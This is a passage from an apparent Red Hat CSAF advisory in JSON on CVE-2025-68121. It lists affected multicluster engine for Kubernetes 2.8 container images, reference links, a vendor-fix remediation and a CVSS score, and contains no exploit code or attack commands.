"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-68121"
},
{
"category": "external",
"summary": "RHBZ#2437111",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2437111"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-68121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68121"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121"
},
{
"category": "external",
"summary": "https://go.dev/cl/737700",
"url": "https://go.dev/cl/737700"
},
{
"category": "external",
"summary": "https://go.dev/issue/77217",
"url": "https://go.dev/issue/77217"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk",
"url": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4337",
"url": "https://pkg.go.dev/vuln/GO-2026-4337"
}
],
"release_date": "2026-02-05T17:48:44.141000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-15T01:45:31+00:00",
"details": "For multicluster engine for Kubernetes, see the following documentation for\ndetails on how to install the images:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.13/html/clusters/cluster_mce_overview#mce-install-intro",
"product_ids": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:8218"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
